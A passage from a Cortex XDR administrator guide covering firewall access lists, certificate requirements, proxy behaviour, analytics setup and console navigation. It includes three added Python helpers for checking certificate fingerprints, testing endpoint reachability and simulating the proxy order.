6. Finalize corporate policy and protected processes.
Duration: A few minutes
Plan: Deploy protection rules globally.

Enable Access to Cortex XDR


After you receive your account details, enable and verify access to Cortex XDR.

STEP 1 | (Optional) If you are deploying the broker VM as a proxy between Cortex XDR and the Cortex
XDR agents, start by enabling the communication between them.

STEP 2 | In your firewall configuration, enable access to Cortex XDR communication servers, storage
buckets, and resources.
For the complete list of resources, refer to Resources Required to Enable Access for Cortex XDR.
With Palo Alto Networks firewalls, we recommend that you use the following App-IDs to allow
communication between Cortex XDR agents and the Cortex XDR management console when you
configure your security policy:
• cortex-xdr—Requires PAN-OS Applications and Threats content update version 8279 or a later
release.
• traps-management-service—Requires PAN-OS Applications and Threats content update
version 793 or a later release.
If you use App-ID in your security policy, you must also allow access for additional resources that are
not covered by the App-ID. If you do not use Palo Alto Networks firewalls with App-ID you must allow
access to the full list of resources.

STEP 3 | To establish secure communication (TLS) to Cortex XDR, the endpoints, and any other devices
that initiate a TLS connection with Cortex, you must have the following certificates installed on
the operating system:

Certificate Fingerprint

GoDaddy Root Certificate Authority - G2 (Godaddy)
• SHA1 Fingerprint—47 BE AB C9 22 EA E8 0E 78 78 34 62 A7 9F 45 C2 54 FD E6 8B
• SHA256 Fingerprint—45 14 0B 32 47 EB 9C C8 C5 B4 F0 D7 B5 30 91 F7 32 92 08 9E 6E 5A 63 E2 74 9D D3 AC A9 19 8E DA

GoDaddy Class 2 Root Certification Authority Certificate
• SHA1 Fingerprint—27 96 BA E6 3F 18 01 E2 77 26 1B A0 D7 77 70 02 8F 20 EE E4
• SHA256 Fingerprint—C3 84 6B F2 4B 9E 93 CA 64 27 4C 0E C6 7C 1E CC 5E 02 4F FC AC D2 D7 40 19 35 0E 81 FE 54 6A E4

GlobalSign (Google)
• SHA1 Fingerprint—75 E0 AB B6 13 85 12 27 1C 04 F8 5F DD DE 38 E4 B7 24 2E FE
• SHA256 Fingerprint—CA 42 DD 41 74 5F D0 B8 1E B9 02 36 2C F9 D8 BF 71 9D A1 BD 1B 1E FC 94 6F 5B 4C 99 F4 2C 1B 9E

For the Cortex XDR agent 5.X release installed on endpoints running a Windows version that does not
support SHA256 by default, you must install KB2868626 to establish a connection between Cortex XDR
and the agent. This applies to Windows Server 2003 R2 (32-bit) (SP2 & later), Windows Server 2003
(32-bit) (SP2 & later), Windows XP (32-bit) (SP3 & later), Windows Server 2008 (all editions; FIPS Mode),
and Windows Vista (SP1 & later; FIPS Mode).
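A way to confirm that the roots listed above are actually present in an endpoint's trust store, by comparing the SHA-1/SHA-256 fingerprint of every certificate in a PEM bundle against the published values. This is an added example, not Palo Alto Networks code; the fingerprints are copied from the table above, while the function names, the sample bundle, and the bundle paths mentioned in the comments are this example's own assumptions.

```python
"""Check a PEM bundle for the root CAs Cortex XDR requires, by fingerprint.
Added example (not Palo Alto Networks code). The fingerprints below are the
values printed in the guide; everything else is this example's own."""
import base64
import hashlib
import re

# Fingerprints exactly as printed in the guide; normalize() strips the spaces.
REQUIRED_ROOTS = {
    "GoDaddy Root Certificate Authority - G2": {
        "sha1": "47 BE AB C9 22 EA E8 0E 78 78 34 62 A7 9F 45 C2 54 FD E6 8B",
        "sha256": "45 14 0B 32 47 EB 9C C8 C5 B4 F0 D7 B5 30 91 F7 32 92 08 9E 6E 5A 63 E2 74 9D D3 AC A9 19 8E DA",
    },
    "GoDaddy Class 2 Root Certification Authority Certificate": {
        "sha1": "27 96 BA E6 3F 18 01 E2 77 26 1B A0 D7 77 70 02 8F 20 EE E4",
        "sha256": "C3 84 6B F2 4B 9E 93 CA 64 27 4C 0E C6 7C 1E CC 5E 02 4F FC AC D2 D7 40 19 35 0E 81 FE 54 6A E4",
    },
    "GlobalSign (Google)": {
        "sha1": "75 E0 AB B6 13 85 12 27 1C 04 F8 5F DD DE 38 E4 B7 24 2E FE",
        "sha256": "CA 42 DD 41 74 5F D0 B8 1E B9 02 36 2C F9 D8 BF 71 9D A1 BD 1B 1E FC 94 6F 5B 4C 99 F4 2C 1B 9E",
    },
}

_PEM_RE = re.compile(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)


def normalize(fingerprint: str) -> str:
    """Upper-case hex with spaces/colons removed, so any printed form compares equal."""
    return re.sub(r"[^0-9a-fA-F]", "", fingerprint).upper()


def fingerprints(der: bytes) -> dict:
    """SHA-1 and SHA-256 fingerprints of a DER-encoded certificate (hash of the raw DER)."""
    return {
        "sha1": hashlib.sha1(der).hexdigest().upper(),
        "sha256": hashlib.sha256(der).hexdigest().upper(),
    }


def iter_pem_certs(bundle_text: str):
    """Yield the DER bytes of every CERTIFICATE block in a PEM bundle."""
    for body in _PEM_RE.findall(bundle_text):
        yield base64.b64decode("".join(body.split()))


def check_bundle(bundle_text: str, required: dict = REQUIRED_ROOTS) -> dict:
    """Map each required root name to True when a certificate whose SHA-256 (or
    SHA-1) fingerprint matches the published value is present in the bundle."""
    present = set()
    for der in iter_pem_certs(bundle_text):
        fp = fingerprints(der)
        present.update((fp["sha1"], fp["sha256"]))
    return {
        name: normalize(fps["sha256"]) in present or normalize(fps["sha1"]) in present
        for name, fps in required.items()
    }


def der_to_pem(der: bytes) -> str:
    """Wrap DER bytes in PEM armor (used here only to build the constructed sample)."""
    b64 = base64.b64encode(der).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN CERTIFICATE-----\n" + "\n".join(lines) + "\n-----END CERTIFICATE-----\n"


# Constructed sample: made-up bytes in PEM armor, NOT a real certificate, so the
# example runs offline. In practice read a real bundle, e.g. (assumed paths)
# /etc/ssl/certs/ca-certificates.crt on Debian-based Linux, or a root exported
# from the Windows certificates MMC snap-in as "Base-64 encoded X.509 (.CER)".
SAMPLE_DER = b"constructed sample bytes, not a real certificate"
SAMPLE_BUNDLE = der_to_pem(SAMPLE_DER)


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_BUNDLE
    for name, ok in check_bundle(text).items():
        print(("present " if ok else "MISSING ") + name)
```

The comparison is on the hash of the DER encoding, which is what both OpenSSL's `-fingerprint` output and the Windows certificate "Thumbprint" field report, so a mismatch against the table means the store holds a different certificate (for example an interposed or stale root), not merely a different presentation of the same one. Against the constructed sample every required root reports MISSING, which is the expected result for a bundle that does not contain them.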

STEP 4 | (Windows only) Enable access for Windows CRL checks.
(Endpoints running the following or later releases: Traps 6.0.3, Traps 6.1.1, and Cortex XDR 7.0) When the Cortex XDR agent examines portable executables (PEs) running on the endpoint as part of the enforced Malware Security Profile, it performs a certificate revocation check. The check confirms that the certificate used to sign a given PE is still considered valid by its Certificate Authority (CA) and has not been revoked. To validate the certificate, the Cortex XDR agent uses Microsoft Windows APIs, which cause the operating system to fetch the relevant Certificate Revocation List (CRL) from the internet. To complete the check, the endpoint needs HTTP access to a dynamic list of URLs that depends on which PEs are executed or scanned on the endpoint.
1. If a system-wide proxy is defined for the endpoint (statically or using a PAC file), Microsoft Windows downloads the CRLs through that proxy.
2. If a proxy is defined only for the Cortex XDR agent, and the endpoint has no other HTTP access to the internet, Microsoft Windows cannot download the CRLs. The revocation check then fails open: the agent treats the certificate as valid, and each PE execution is delayed while the download attempt times out. If the Cortex XDR agent runs in an isolated environment where revocation checks can never complete, the Palo Alto Networks Support team can provide a configuration file that disables the checks and removes the unnecessary latency. Note that with the checks disabled, a PE signed with a revoked certificate is still trusted on that endpoint; use this only where the outbound access genuinely cannot be provided.

STEP 5 | (Supported on Cortex XDR agent 7.0 or later for Windows endpoints and Cortex XDR agent 7.3 or later for Mac and Linux endpoints) Enable peer-to-peer (P2P) content updates.
By default, the Cortex XDR agent retrieves content updates from peer Cortex XDR agents on the same subnet. To allow P2P, permit UDP and TCP traffic on port 33221 between endpoints. You can change the port number, or choose to download content directly from the Cortex XDR server instead, in the Agent Settings profile.

STEP 6 | Verify that you can access your Cortex XDR tenant.
After you download and install the Cortex XDR agent software on your endpoints and configure your
endpoint security policy, verify that the Cortex XDR agents can check in with Cortex XDR to receive the
endpoint policy.

STEP 7 | If you use SSL decryption and experience difficulty in connecting the Cortex XDR agent to the
server, we recommend that you add the FQDNs required for access to your SSL Decryption
Exclusion list.
In PAN-OS 8.0 and later releases, you can configure the list in Device > Certificate Management > SSL
Decryption Exclusion.

Resources Required to Enable Access for Cortex XDR


To enable access to Cortex XDR components, you must allow access to various Palo Alto Networks resources. If you use the specific Palo Alto Networks App-IDs indicated in the table, you do not need to explicitly allow access to the resource. A dash (—) indicates there is no App-ID coverage for a resource. For the IP address ranges defined by GCP, see the following references:
• https://www.gstatic.com/ipranges/goog.json
• https://www.gstatic.com/ipranges/cloud.json

Some of the IP addresses required for access are registered in the United States. As a
result, some GeoIP databases do not correctly pinpoint the location in which IP addresses
are used. In regard to customer data, Cortex Data Lake stores all data in your deployment
region, regardless of the IP address registration and restricts data transmission through any
infrastructure to that region. For considerations, see Plan Your Cortex XDR Deployment.

Throughout this topic, <xdr-tenant> refers to the chosen subdomain of your Cortex XDR
tenant and <region> is the region in which your Cortex Data Lake is deployed (see Plan
Your Cortex XDR Deployment for supported regions).

Each entry below lists the FQDN, the IP addresses and port, and the App-ID coverage.

distributions.traps.paloaltonetworks.com
Used for the first request in the registration flow, where the agent passes the distribution ID and obtains the ch-<xdr-tenant>.traps.paloaltonetworks.com address of its tenant.
• IP address—35.223.6.69
• Port—80
• App-ID coverage: traps-management-service

wss://lrc-<region>.paloaltonetworks.com
Used in the live terminal flow.
• IP address by region: US—35.190.88.43, EU—35.244.251.25, CA—35.203.99.74, UK—35.242.159.176, JP—34.84.201.32, SG—34.87.61.186, AU—35.244.66.177
• Port—443
• App-ID coverage: cortex-xdr

panw-xdr-installers-prod-us.storage.googleapis.com
Used to download installers for upgrade actions from the server. This storage bucket is used for all regions.
• IP ranges in GCP
• Port—443
• App-ID coverage: cortex-xdr

panw-xdr-payloads-prod-us.storage.googleapis.com
Used to download the executable for live terminal for Cortex XDR agents earlier than version 7.1.0. This storage bucket is used for all regions.
• IP ranges in GCP
• Port—443
• App-ID coverage: cortex-xdr

global-content-profiles-policy.storage.googleapis.com
Used to download content updates.
• IP ranges in GCP
• Port—443
• App-ID coverage: cortex-xdr

panw-xdr-evr-prod-<region>.storage.googleapis.com
Used to download extended verdict request results in scanning.
• IP ranges in GCP
• Port—443
• App-ID coverage: cortex-xdr

app-proxy.<region>.paloaltonetworks.com
• IP address by region: US—35.223.171.227, EU—34.90.29.180, CA—35.203.84.164, UK—34.89.82.240, JP—35.187.204.244, SG—35.247.128.12, AU—35.189.54.120
• Port—443
• App-ID coverage: —

dc-<xdr-tenant>.traps.paloaltonetworks.com
Used for EDR data upload.
• IP address by region: US—34.98.77.231, EU—34.102.140.103, CA—34.96.120.25, UK—35.244.133.254, JP—34.95.66.187, SG—34.120.142.18, AU—34.102.237.151
• Port—443
• App-ID coverage: traps-management-service

ch-<xdr-tenant>.traps.paloaltonetworks.com
Used for all other requests between the agent and its tenant server, including heartbeat, uploads, action results, and scan reports.
• IP address by region: US—34.98.77.231, EU—34.102.140.103, CA—34.96.120.25, UK—35.244.133.254, JP—34.95.66.187, SG—34.120.142.18, AU—34.102.237.151
• Port—443
• App-ID coverage: traps-management-service

api-<xdr-tenant>.xdr.<region>.paloaltonetworks.com
Used for API requests and responses.
• IP address by region: US—35.222.81.194, EU—34.90.67.58, CA—35.203.82.121, UK—34.89.56.78, JP—34.84.125.129, SG—34.87.83.144, AU—35.189.18.208
• Port—443
• App-ID coverage: —

cc-<xdr-tenant>.traps.paloaltonetworks.com
Used for get-verdict requests.
• IP address by region: US—35.224.140.14, EU—34.90.71.103, CA—35.203.35.23, UK—34.89.42.214, JP—34.84.225.105, SG—35.247.161.94, AU—35.201.23.188
• Port—443
• App-ID coverage: traps-management-service

Broker VM Resources
Required for deployments that use Broker VM features.

br-<xdr-tenant>.xdr.<region>.paloaltonetworks.com
• IP address by region: US—104.155.131.72, EU—34.91.128.226, CA—34.95.8.232, UK—35.197.219.110, JP—34.85.74.43, SG—34.87.167.125, AU—35.244.93.0
• Port—443
• App-ID coverage: —

time.google.com and pool.ntp.org
• UDP port—123
• App-ID coverage: —

App Login and Authentication

identity.paloaltonetworks.com (SSO)
• IP address—34.107.215.35
• Port—443
• App-ID coverage: —

login.paloaltonetworks.com (SSO)
• IP address—34.107.190.184
• Port—443
• App-ID coverage: —

In-App Help Center and Notifications

data.pendo.io
• Port—443
• App-ID coverage: —

pendo-static-5664029141630976.storage.googleapis.com
• Port—443
• App-ID coverage: —
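Step 6 above asks you to verify that agents can reach the tenant; the entries just listed are what that verification has to cover. The following script is an added example, not Palo Alto Networks tooling: it expands the <xdr-tenant> and <region> templates for the agent-facing entries in the table, attempts a TCP connection to each host and port, and reports every failure together with its class (name resolution versus dropped or refused connection), which is usually enough to tell a DNS or split-horizon problem from a firewall rule. The `probe` argument is injected so the reporting logic can be exercised offline against constructed results; by default it uses `socket.create_connection`. One assumption: `region` is the exact token that appears in the tenant's own FQDNs.

```python
"""Reachability check for the agent-facing endpoints listed above.

Added example, not Palo Alto Networks tooling. Usage:
    python3 xdr_access_check.py <xdr-tenant> <region>
Assumption: <region> is the token used in the tenant's own FQDNs.
"""
import socket

# (template, port, purpose), copied from the table above. Buckets listed there
# as "IP ranges in GCP" cannot be pinned to one address, so only the name is used.
AGENT_ENDPOINTS = [
    ("distributions.traps.paloaltonetworks.com", 80, "first registration request"),
    ("ch-{tenant}.traps.paloaltonetworks.com", 443, "heartbeat, uploads, action results, scan reports"),
    ("dc-{tenant}.traps.paloaltonetworks.com", 443, "EDR data upload"),
    ("cc-{tenant}.traps.paloaltonetworks.com", 443, "get-verdict requests"),
    ("lrc-{region}.paloaltonetworks.com", 443, "live terminal (wss)"),
    ("panw-xdr-installers-prod-us.storage.googleapis.com", 443, "installer downloads"),
    ("global-content-profiles-policy.storage.googleapis.com", 443, "content updates"),
    ("panw-xdr-evr-prod-{region}.storage.googleapis.com", 443, "extended verdict results"),
]

def expand(tenant, region, endpoints=AGENT_ENDPOINTS):
    """Substitute the tenant subdomain and region token into each template."""
    return [(host.format(tenant=tenant, region=region), port, purpose)
            for host, port, purpose in endpoints]

def tcp_probe(host, port, timeout=5.0):
    """'ok' if a TCP handshake completes, otherwise a short failure class."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "ok"
    except socket.gaierror:
        return "dns"                  # name does not resolve: DNS or split-horizon issue
    except (socket.timeout, TimeoutError):
        return "timeout"              # packets dropped: firewall or no route
    except OSError as exc:
        return f"error:{exc.errno}"   # e.g. ECONNREFUSED from an intercepting device

def check_access(tenant, region, probe=tcp_probe):
    """Return [(fqdn, port, purpose, status)] for every endpoint whose status is not 'ok'."""
    report = []
    for host, port, purpose in expand(tenant, region):
        status = probe(host, port)
        if status != "ok":
            report.append((host, port, purpose, status))
    return report

if __name__ == "__main__":
    import sys
    failures = check_access(sys.argv[1], sys.argv[2])
    for host, port, purpose, status in failures:
        print(f"FAIL {host}:{port} [{status}] needed for {purpose}")
    sys.exit(1 if failures else 0)
```

This tests transport reachability only. A decrypting proxy that accepts the TCP connection and then presents its own certificate still shows as `ok` here, which is exactly the case Step 7 handles with the SSL Decryption Exclusion list; pair this check with the certificate fingerprint comparison from Step 3 when an agent connects but never registers.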

Proxy Communication
You can configure communication through proxy servers between the Cortex XDR server and the Cortex XDR agents running on Windows, Mac, and Linux endpoints. The Cortex XDR agent uses the proxy settings defined in the Internet and Network settings of the endpoint or discovered through the WPAD protocol. You can also configure a list of proxy servers that your Cortex XDR agent will use to communicate with the Cortex XDR server.
Cortex XDR supports the following types of proxy configurations:
• System-wide proxy—Use a system-wide proxy to send all communication on the endpoint, including to and from the Cortex XDR agent, through a proxy server configured for the endpoint. Cortex XDR supports proxy settings defined explicitly on the endpoint as well as proxy settings configured in a proxy auto-config (PAC) file.
• Application-specific proxy—(Available with Traps agent 5.0.9, Traps agent 6.1.2, and Cortex XDR agent 7.0 and later releases) Configure a Cortex XDR specific proxy that applies only to the Cortex XDR agent and does not enforce proxy communication for other apps or services on your endpoint. You can set up to five proxy servers, either during the Cortex XDR agent installation process or, following agent installation, directly from the Cortex XDR management console.
If the endpoints in your environment are not connected directly to the internet, you can deploy a Palo Alto Networks broker VM.
Application-specific proxy configurations take precedence over system-wide proxy configurations. The Cortex XDR agent retrieves the proxy list defined on the endpoint and first tries to establish communication with the Cortex XDR server through the app-specific proxies. If that is unsuccessful, the agent tries the system-wide proxy, if one is defined. If neither is defined, the Cortex XDR agent attempts to communicate with the Cortex XDR server directly. The Cortex XDR agent does not support proxy communication in environments where proxy authentication is required.
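When an agent stops checking in after a proxy change, the question is which of the candidates in that order it actually ended up using. The following simulation is an added example, not the Cortex XDR agent's code: `resolve_route` applies the documented order (app-specific proxies first, at most five, in list order; then the system-wide proxy if configured; then direct) and treats a proxy that demands authentication as failed, since authenticated proxies are not supported. The `connect` callable is injected; `make_connector` builds a constructed network model so the order can be exercised offline, whereas a real check would issue an HTTP CONNECT to the tenant through each candidate. The tenant hostname is a placeholder.

```python
"""Simulation of the Cortex XDR agent proxy selection order described above.

Added example, not agent code. The connector is injected so the order can be
exercised against a constructed network model.
"""
MAX_APP_PROXIES = 5      # limit stated above
SERVER = "ch-<xdr-tenant>.traps.paloaltonetworks.com:443"   # placeholder, not a real tenant

class ProxyAuthRequired(Exception):
    """Raised by a connector when the proxy replies 407 Proxy Authentication Required."""

def resolve_route(app_proxies, system_proxy, connect, log=None):
    """Return ('app', proxy), ('system', proxy) or ('direct', None).

    Raises ConnectionError, with the attempt log in the message, when every
    candidate fails. `connect(server, proxy)` returns True on success, False
    when unreachable, or raises ProxyAuthRequired; proxy is None for direct.
    """
    log = [] if log is None else log
    candidates = [("app", p) for p in list(app_proxies)[:MAX_APP_PROXIES]]
    if system_proxy:
        candidates.append(("system", system_proxy))
    candidates.append(("direct", None))
    for kind, proxy in candidates:
        label = f"{kind} {proxy or '(none)'}"
        try:
            if connect(SERVER, proxy):
                log.append(f"{label}: ok")
                return kind, proxy
            log.append(f"{label}: unreachable")
        except ProxyAuthRequired:
            # Authenticated proxies are unsupported: treated as a failed candidate.
            log.append(f"{label}: 407, authenticated proxies unsupported")
    raise ConnectionError("no route to Cortex XDR: " + "; ".join(log))

def make_connector(reachable, auth_required=()):
    """Constructed network model: which proxies (None = direct) reach the server."""
    def connect(server, proxy):
        if proxy in auth_required:
            raise ProxyAuthRequired(proxy)
        return proxy in reachable
    return connect
```

Two things the model makes visible: a sixth app-specific proxy is never consulted, and an authenticating proxy is not a degraded path but a dead one, so an endpoint whose only egress is such a proxy needs the broker VM rather than a proxy entry.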

Set up Network Analysis
With a Cortex XDR Pro per TB license you must set up your network sensors and define network coverage
for your internal networks.

STEP 1 | Set up your network sensors.
1. If you use unmanaged Palo Alto Networks firewalls and did not configure log forwarding on your firewalls before activating Cortex XDR, Start Sending Logs to Cortex Data Lake.
2. (Optional) Set up External Data Ingestion.
If you have external (non-Palo Alto Networks) network sensors, you can set up a syslog collector to receive alerts or logs from them. If you send external alerts, Cortex XDR can include any of them in relevant incidents for a more complete picture of the activity involved. If you send logs and alerts from external sources such as Check Point firewalls, Cortex XDR can apply analytics to the external logs, raise analytics alerts on them, and include the external alerts in incidents for additional context.
3. (Optional) If you use a third-party authentication service, you can Ingest Authentication Logs and Data into authentication stories. After you set up log collection, you can search for authentication data using the Query Builder.
4. (Optional) If you want to use Pathfinder to examine unmanaged network hosts, servers, and workstations for malicious or risky software, Activate Pathfinder.

STEP 2 | Configure the internal networks that you want Cortex XDR to monitor.
1. From the Cortex XDR management console, navigate to Assets > Network Configuration.
2. Define your IP Address Ranges.
This page provides a table of the IP address ranges Cortex XDR Analytics monitors, which is pre-populated with the default IPv4 and IPv6 address spaces.
3. Define your Domain Names.

STEP 3 | If you use GlobalProtect or Prisma Access, add the GlobalProtect VPN IP address pool for the VPN traffic that you want to monitor.
1. To enable the Cortex XDR app to analyze your VPN traffic, add (+) a new segment and specify the first and last IP address of your GlobalProtect VPN IP address pool.
2. Identify this network segment as Reserved for VPN. GlobalProtect dynamically assigns IP addresses from the IP pool to the mobile endpoints that connect to your network. The Cortex XDR analytics engine creates virtual entity profiles for network segments that are reserved for VPN.
3. Save the network segment. If the Configuration saved notification does not appear, save again.

STEP 4 | If you selected a Directory Sync instance during the Cortex XDR activation process, configure
Cortex XDR to use it.

Configure Cortex XDR
Before you can begin using Cortex XDR, you must set up your alert sensors. The more sensors you integrate with Cortex XDR, the more context you have when a threat is detected. You can also set up Cortex XDR to raise Analytics alerts on network or endpoint data (or both), depending on your Cortex XDR Pro licenses.
The following workflow highlights the tasks that you must perform (in order) to configure Cortex XDR.

STEP 1 | Integrate External Threat Intelligence Services.
Integrating external threat intelligence services enables you to view feeds from sources such as AutoFocus and VirusTotal in the context of your incident investigation.

STEP 2 | After you activate Cortex XDR apps and services, wait 24 hours and then configure the Cortex XDR analytics.
1. Specify the internal networks that you want Cortex XDR to monitor.
2. (Recommended) If you want to use Pathfinder to scan unmanaged endpoints, Activate Pathfinder.
3. Activate Cortex XDR - Analytics.
By default, Cortex XDR - Analytics is disabled. Activating Cortex XDR - Analytics enables the Cortex XDR analytics engine to analyze your endpoint data to develop a baseline and raise Analytics and Analytics BIOC alerts when anomalies and malicious behaviors are detected.
To create a baseline for enabling Analytics, Cortex XDR requires a minimum set of data: EDR logs from at least 30 endpoints over a minimum of 2 weeks. Once this requirement is met, Cortex XDR allows you to enable analytics and begins triggering alerts within a few hours.
1. In Cortex XDR, select the gear icon in the upper right corner and then select Settings > Cortex XDR - Analytics.
The Enable option is grayed out if you do not have the required data set.
2. When available, Enable Cortex XDR - Analytics. The analytics engine immediately begins analyzing your Cortex data for anomalies.

Creating a baseline can take up to 3 hours.

STEP 3 | Add an Alert Exclusion Policy.

STEP 4 | Manage Incident Starring.

STEP 5 | (Optional) Palo Alto Networks automatically delivers behavioral indicator of compromise (BIOC) rules defined by the Palo Alto Networks threat research team to all Cortex XDR tenants, but you can also import any additional indicators as rules, as needed.
To alert on specific BIOCs, Create a BIOC Rule. To immediately begin alerting on known malicious indicators of compromise (IOCs), such as known malicious IP addresses, Create an IOC Rule.

Integrate External Threat Intelligence Services


To aid you with threat investigation, Cortex XDR displays the WildFire-issued verdict for each Key Artifact
in an incident. To provide additional verification sources, you can integrate an external threat intelligence
service with Cortex XDR. The threat intelligence services the app supports are:
• AutoFocus™—AutoFocus groups conditions and indicators related to a threat with a tag. Tags can
be user-defined or come from threat-research team publications and are divided into classes, such as
exploit, malware family, and malicious behavior. When you add the service, the relevant tags display in
the incident details page under Key Artifacts. Without an AutoFocus license key, you can still pivot from
Cortex XDR to the service to initiate a query for the artifact. See the AutoFocus Administrator’s Guide
for more information on AutoFocus tags.
• VirusTotal—VirusTotal provides aggregated results from over 70 antivirus scanners, domain and URL blocklisting services, and user contributions. The VirusTotal score is represented as a fraction where, for example, a score of 34/52 means that of 52 queried services, 34 determined the artifact to be malicious. When you add the service, the relevant VirusTotal score displays in the incident details page under Key Artifacts. Without a VirusTotal license key, you can still pivot from Cortex XDR to the service to initiate a query for the artifact.
• WildFire®—WildFire detects known and unknown threats, such as malware. The WildFire verdict contains detailed insights into the behavior of identified threats. The WildFire verdict displays next to relevant Key Artifacts in the incident details page, the Causality View, and the Live Terminal view of processes.

WildFire provides verdicts and analysis reports to Cortex XDR users without requiring a license key. Using WildFire for next-generation firewalls or other use cases continues to require an active license.
Before you can view external threat intelligence in Cortex XDR incidents, you must obtain the license key for the service and add it to the Cortex XDR configuration. After you integrate any services, you will see the verdict or verdict score when you Investigate Incidents.
To integrate an external threat intelligence service:

STEP 1 | Get the API license key for the service.
• Get your AutoFocus API key.
• Get your VirusTotal API key.

STEP 2 | Enter the license key in the Cortex XDR app.

Select the gear icon in the menu bar, then Settings > Threat Intelligence, and enter the license key.

STEP 3 | Test your license key.
Select Test. If there is an issue, an error message provides more details.

STEP 4 | Verify the service integration in an incident.
After adding the license key, you should see the additional verdict information from the service included in the Key Artifacts of an incident. You can right-click the service, such as VirusTotal (VT) or AutoFocus (AF), to see the entire verdict. See Investigate Incidents for more information on where these services are used within the Cortex XDR app.

Set up Your Cortex XDR Environment


To create a more personalized user experience, Cortex XDR enables you to customize the following:
• Keyboard Shortcuts
• User Timezone
• Distribution List Emails
• Impersonation Role

Define Keyboard Shortcuts
Select the keyboard shortcuts for the Cortex XDR capabilities.

STEP 1 | From the Cortex XDR management console, select the gear icon and navigate to Settings > General.

STEP 2 | In the Keyboard Shortcuts section, change the default settings for:
• Artifact and Asset Views
• Quick Launcher
The shortcut value must be a keyboard letter, A through Z, and cannot be the same for both shortcuts.
Select Timezone
Select your own timezone. The selected timezone affects the timestamps displayed in the Cortex XDR management console, in audit logs, and in exported files.

STEP 1 | From the Cortex XDR management console, select the gear icon and navigate to Settings > General.

STEP 2 | In the Timezone section, select the timezone in which you want to display your Cortex XDR data.

Define Distribution List Emails
Define a list of email addresses Cortex XDR can use as distribution lists. The defined email addresses are used to send product maintenance, update, and new version notifications. These addresses are in addition to the email addresses registered with your CSP account.

STEP 1 | From the Cortex XDR management console, select the gear icon and navigate to Settings > General.

STEP 2 | In the Email Contacts section, enter the email addresses you want to include in a distribution list. Make sure to confirm each email address after you enter it.

Impersonation Role
Define the role permissions granted to the Palo Alto Networks Support team when you open support tickets. By default, Palo Alto Networks Support is granted read-only access to your tenant.

STEP 1 | From the Cortex XDR management console, select the gear icon and navigate to Settings > General.

STEP 2 | In the Impersonation Role section, define the level and duration of the permissions.
• Select one of the following Role permissions:
• Read-Only—Default setting; grants read-only access to your tenant.
• Support related actions—Grants permissions for tech support file collection, dump file collection, investigation queries, BIOC and IOC rule editing, alert starring, and exclusion and exception editing.
• Full role permissions—No limitations are applied; grants full permissions to all actions and content on your tenant.
• Set the Permission Reset Timeframe.
If you selected Support related actions or Full role permissions in the Role field, set how long these permissions remain valid. Select either 7 Days, 30 Days, or No time limitation.
We recommend that elevated role permissions are granted only for a specific timeframe, and that full administrative permissions are granted only when specifically requested by the support team. Note that Support related actions already includes editing BIOC and IOC rules and exclusions, which changes what your tenant detects, so review those changes in the audit log when the ticket closes.

Set up Outbound Integration
With Cortex XDR, you can set up any of the following optional outbound integrations:
• Integrate Slack for Outbound Notifications
• Integrate a Syslog Receiver
• Integrate with Cortex XSOAR—Send alerts to Cortex XSOAR for automated and coordinated threat
response. From Cortex XSOAR, you define, adjust, and test playbooks that respond to Cortex XDR
alerts. You can also manage your incidents in Cortex XSOAR with any changes automatically synced to
Cortex XDR. For more information, see the in-app documentation in Cortex XSOAR.
• Integrate with external receivers such as ticketing systems—To manage incidents from the application
of your choice, you can use the Cortex XDR API Reference to send alerts and alert details to an external
receiver. After you generate your API key and set up the API to query Cortex XDR, external apps can
receive incident updates, request additional data about incidents, and make changes such as to set the
status and change the severity, or assign an owner. To get started, see the Cortex XDR API Reference.

Use the Cortex XDR Interface
Cortex XDR provides an easy-to-use interface that you can access from the hub. By default, Cortex XDR
displays the Incident Management Dashboard when you log in. If desired, you can change the default
dashboard or Build a Custom Dashboard that displays when you log in.

Each SAML login session is valid for 8 hours.

Depending on your license and assigned role, you can explore the following areas in the app.

Interface and description:

Reporting: From this menu, you can manage your dashboards and run reports.

Investigation: From this menu, you can investigate a lead or hunt for threats. You can access the Query Builder to search logs from your Palo Alto Networks sensors, the Query Center to view the status of all queries, and Scheduled Queries to view the status and modify the frequency of recurring queries. You can also view all incidents, prioritize incidents, and set alert exceptions.

Response: From this menu, you can respond to identified threats and take action. With a Cortex XDR Prevent or Cortex XDR Pro per Endpoint license, you can view the Action Center, where you can initiate investigation and response actions such as isolating an endpoint or initiating a live terminal session to investigate processes and files locally. From this menu, you can also add malicious domains and IP addresses to an external dynamic list (EDL) enforceable on your Palo Alto Networks firewall.

Endpoints: With a Cortex XDR Prevent or Cortex XDR Pro per Endpoint license, you can manage your endpoints and endpoint security policy from this menu.

Security: From this menu, you can configure additional add-on security services such as Device Control. Device Control requires a Cortex XDR Prevent or Cortex XDR Pro per Endpoint license.

Rules: With a Cortex XDR Pro per TB license, you can define indicators of known threats so that Cortex XDR raises alerts when they are detected. As you investigate and research threats and uncover specific indicators and behaviors associated with a threat, you can create rules to detect and alert you when the behavior occurs.

Add-ons: With a Cortex XDR Pro license, you can access additional Cortex XDR modules available for your tenant, such as Host Insights.

Assets: From this menu, you can define your network parameters and view a list of all the assets in your network.

Quick Launcher: Open an in-context shortcut that you can use to search for information, perform common investigation tasks, or initiate response actions from any place in the Cortex XDR app.

Settings and management: From the gear icon, you can view a log of actions initiated by Cortex XDR analysts, configure Cortex XDR settings to integrate with other apps and services, and manage settings for the analytics engine.

Notifications: View Cortex XDR notifications, such as when a query completes.

User: From the User menu, see who is logged into Cortex XDR. Right-click and select:
• About to view additional version and tenant ID information.
• What’s New to view selected new features available for your license type.
• Hide / Show Guide Center to toggle display of the Guide Center icon.
• Log Out to end your session with the Cortex XDR management console.

Hub: Access a list of apps allocated to your hub account.

The following topics describe additional management actions you can perform on page results:
• Filter Page Results
• Save and Share Filters
• Show or Hide Results
• Manage Columns and Rows

Manage Tables
Most pages in Cortex XDR present data in table format and provide controls to help you manage and filter
the results. If additional views or actions are available for a specific value, you can pivot (right-click) from
the value in the table. For example, you can view the incident details, or pivot to the Causality View for an
alert or you can pivot to the results for a query.

On most pages, you can also refresh the content on the page.
To manage tables in the app:
• Filter Page Results
• Export Results to File
• Save and Share Filters
• Show or Hide Results
• Manage Columns and Rows

Filter Page Results
To reduce the number of results, you can filter by any heading and value. When you apply a filter, Cortex XDR displays the filter criteria above the results table. You can also filter individual columns for specific values using the icon to the right of the column heading.
